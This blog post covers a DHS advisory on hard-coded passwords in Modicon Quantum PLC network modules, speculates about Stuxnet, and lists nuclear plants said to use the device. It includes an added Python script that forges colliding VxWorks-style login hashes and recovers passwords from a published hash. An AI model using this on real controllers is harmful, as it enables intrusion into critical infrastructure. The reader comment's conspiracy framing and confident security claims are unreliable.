DHS warns of SCADA vulnerability; neglects to mention what it resembles or how closely | (the STUXNET files)

An electronic device used to control machinery in water plants and other industrial facilities contains serious weaknesses that allow attackers to take it over remotely, the U.S. Industrial Control Systems Cyber Emergency Response Team warned. Some models of the Modicon Quantum PLC used in industrial control systems contain multiple hidden accounts that use predetermined passwords to grant remote access, the agency said in an advisory issued December 14. Palatine, Illinois-based Schneider Electric, the maker of the device, produced fixes for some of the weaknesses, and continues to develop additional mitigations. The programmable logic controllers reside at the lowest levels of an industrial plant, where computerized sensors meet the valves, turbines, or other machinery being controlled. The default passwords are hard-coded into Ethernet cards the systems use to funnel commands into the devices, and get temperatures and other data out of them. The Ethernet modules also allow administrators to remotely log into the machinery using protocols such as telnet, FTP, and the Wind River Debug port. According to a blog post published December 12 by an independent security researcher, the NOE 100 and NOE 771 modules contain at least 14 hard-coded passwords, some of which are published in support manuals. Even in cases where the passcodes are obscured using cryptographic hashes, they are easy to recover thanks to documented weaknesses in the underlying VxWorks operating system. As a result, attackers can exploit the weakness to log into devices and gain privileged access to their controls.
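The passage says the hashed passwords are "easy to recover thanks to documented weaknesses in the underlying VxWorks operating system." The script below is an added illustration of why that is so; it is not code from the ICS-CERT advisory, The Register, or the researcher's post. It is a simplified Python reimplementation of the structure that public analyses ascribe to VxWorks' loginDefaultEncrypt routine: each byte is weighted by the square of its position, the weights are summed, the sum is multiplied by a constant in 32-bit arithmetic and rendered as decimal text. The constant 31695317, the 8..40 byte length bounds, and the omission of the final per-character remapping of that decimal string are assumptions stated in the code; the sample password `password` and the two-letter alphabet are constructed inputs, not device credentials. It builds a second password with an identical hash and brute-forces a working password from a published hash, which is why a hash printed in a support manual is worth as much to an attacker as the password itself.

```python
"""Added illustration (not code from the advisory, The Register or the
researcher's post) of why a VxWorks-style login hash is no protection once
the hash itself is published.

Modelled on the structure public analyses ascribe to VxWorks' loginDefaultEncrypt:
each byte is weighted by the square of its 1-based position, the weights are
summed, the sum is multiplied by a constant in 32-bit arithmetic and rendered
as a decimal string. Assumptions made here: the constant 31695317, the 8..40
byte length bounds, and the omission of the final per-character remapping of
the decimal string (a deterministic remapping cannot separate two inputs whose
integers already collide).
"""
import itertools
from typing import Optional

MAGIC = 31695317           # assumed multiplier from published analyses
MIN_LEN, MAX_LEN = 8, 40   # assumed length bounds of the original routine
PRINTABLE = range(0x21, 0x7F)


def weighted_sum(password: bytes) -> int:
    """Position-weighted byte sum: the only property of the input the hash keeps."""
    if not MIN_LEN <= len(password) <= MAX_LEN:
        raise ValueError("password must be 8..40 bytes")
    return sum(c * (i + 1) ** 2 for i, c in enumerate(password))


def login_hash(password: bytes) -> str:
    """Decimal text of (weighted_sum * MAGIC) mod 2**32."""
    return str((weighted_sum(password) * MAGIC) & 0xFFFFFFFF)


def collide(password: bytes) -> bytes:
    """Return a different printable password with an identical hash.

    Adding (j+1)^2 to byte i and subtracting (i+1)^2 from byte j changes the
    weighted sum by +(i+1)^2*(j+1)^2 and -(i+1)^2*(j+1)^2, i.e. not at all.
    The first index pair that keeps both bytes printable is used.
    """
    for i, j in itertools.permutations(range(len(password)), 2):
        up = password[i] + (j + 1) ** 2
        down = password[j] - (i + 1) ** 2
        if up in PRINTABLE and down in PRINTABLE:
            out = bytearray(password)
            out[i], out[j] = up, down
            return bytes(out)
    raise ValueError("no printable collision found")


def recover_preimage(target_hash: str, alphabet: bytes, length: int) -> Optional[bytes]:
    """Brute-force any password over `alphabet` whose hash equals target_hash.

    The recovered string need not be the original: any collision logs in.
    """
    for cand in itertools.product(alphabet, repeat=length):
        pw = bytes(cand)
        if login_hash(pw) == target_hash:
            return pw
    return None


def count_distinct(alphabet: bytes, length: int) -> int:
    """Number of distinct hashes an entire password space produces."""
    return len({login_hash(bytes(c)) for c in itertools.product(alphabet, repeat=length)})


if __name__ == "__main__":
    pw = b"password"   # constructed sample, not a real device credential
    twin = collide(pw)
    print(pw, twin, "same hash:", login_hash(pw) == login_hash(twin))
    target = login_hash(b"abababab")   # stands in for a hash printed in a manual
    print("recovered from hash alone:", recover_preimage(target, b"ab", 8))
    print("256 two-letter passwords ->", count_distinct(b"ab", 8), "distinct hashes")
```

Because only a weighted sum survives into the hash, the attacker does not need the operator's password at all: any string with the same sum passes the check, and the space of sums is far smaller than the space of passwords. The same reasoning applies whatever the final remapping step looks like, so the conclusion does not depend on the details assumed above.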


The source article is worth visiting for at least two reasons. It gives us the link for "the blog post published on Monday by independent security researcher Rubén Santamarta," and goes on to inform us, just after the end of the passage the DHS saw fit to quote:

SCADA vuln imperils critical infrastructure, feds warn. 

December 14, The Register – (International) 

Hard-coded passwords are a common weakness built into many industrial control systems, including some S7 series of PLCs from Siemens. Because the systems control the machinery connected to dams, gasoline refineries, and water treatment plants, unauthorized access is considered a national security threat because it could be used to sabotage their operation.

Read more 

Remind anyone of anything?

From Schneider Electric (which forms, according to Wikipedia, a cornerstone of AREVA):

Total safety: The cornerstone of our business 

Although electricity is the most flexible energy to generate, transmit and use, it can be hazardous if not properly managed. From homes to nuclear power plants, Schneider Electric's mission is to ensure the safety of people and

Read more 

In fact, Modicon PLCs were, at least as of 2006, in use at
  • at least one nuclear plant in Virginia 
  • two in Korea ("The DPS [Diverse Protection System] configuration is based on a Modicon PLC, which is now supplied by Schneider Electric," notes the NRC, adding helpfully, "The use of multiple vendors and digital platforms promotes system diversity among the echelons of defense.")
  • the Bruce Nuclear Generating Station at Tiverton, Ontario 
  • and no doubt many more that I lack the determination, at present, to dig out of obscurity, given this industry's penchant for burying them there. Witness how neatly the following company avoids, in its boasts, the very proper nouns that would pinpoint which nuclear power plants, likely Canadian, are now at risk:

Synopsis of Nuclear Reactor Retubing Controls Automation System Project

Situation: A nuclear power generation company committed to upgrading its operations with new reactors.
Issues: Aging reactors subject to problems such as water leakage, corrosion, and contamination (fine powdery particulate—iron oxide activated to isotope FE55—as a result of corrosion) that are potentially hazardous and costly to deal with.
Requirement: Upgrade of 2 reactors (including re-tubing operations).
Technology: Unity Pro IEC 61131-3 application software/Modicon Quantum PLC platform; GE Iconics Series HMI; Ethernet; Kepware OPC driver; Kollmorgen drives; PICS™ simulation.

Read more  

Be seeing you.

1 comment:

  1. I find it odd that DHS is making an issue out of these passwords for these systems. If you were to talk to an experienced control system engineer - who is also very aware of the NWO and is concerned about criminal and deceptive activities by globalist interests etc - that engineer would look at you and say "so what?"

    I'm not a control systems engineer but I do know and understand control systems structure and security. For a DCS System (the type of centralized "Distributed Control System" that is used in nuke plants and large manufacturing environments), you have devices in the field that are monitored and controlled, you have the smaller control computers (like the Modicon PLCs in the article) that monitor and control these devices, you have an array of modules that pull and push data to and from the field PLCs, and you have a layer above that that contains control system modules that run the core application.

    Think of a drawing of a system like this in the shape of a pyramid with at least 5 levels, or layers, showing all of the field devices in a layer across the bottom row (instruments and motors etc), with all of the PLCs that control and monitor the device layer sitting across the smaller row above. These are plugged into a computer network that is dedicated to this system in 99.999% of all systems. The PLC layer communicates to the modules of a DCS system, which communicate input and output to/from an even higher layer (the actual DCS system) that runs the primary code.

    Here's the pyramid with levels (L). The Modicon PLCs reside at L1 below:

    L4: Business Systems -
    L3: Production ---
    L2: Input/Output -------
    L1: PLCs -----------
    L0: Devices ---------------

    Now we're getting to my point. In order to infect one of these Modicon PLCs that are associated with a DCS system (L3), you need to either physically load it directly onto the PLC hardware by standing in front of the PLC and connecting a local laptop to load a virus. This is how truly secure facilities make changes today at the PLC (Layer 1) level.

    System security in this case is at Layers 3 and 4 in my diagram. Layer 3 (L3) is the manufacturing system, which has different types of security depending upon how the system is configured to communicate with the business network. In most cases, the system is configured to align with the corporate network security protocols which enables mgt to align production activities with HR assignments, and enables the system to more easily integrate with inventory systems etc. If you construct a virus that is dedicated towards infecting DCS manufacturing systems, using remote access capabilities, this is the lowest layer that you could penetrate. Period.

    So I certainly don't doubt that there's a variant of Stuxnet that can modify and manipulate Modicon PLCs - which CAN operate as stand alone systems on a network with external communications capabilities. But... PLCs operating on a DCS system are networked through the manufacturing layer, which is typically purposefully limited to local networks only - without external communications capability.

    With that in mind, I go all the way back to my initial concern - why would DHS warn about this with regard to nuclear facilities? This should be technically impossible, unless someone on the inside is working the virus, which would make the problem moot because that risk exists in any facility. It's just odd to me.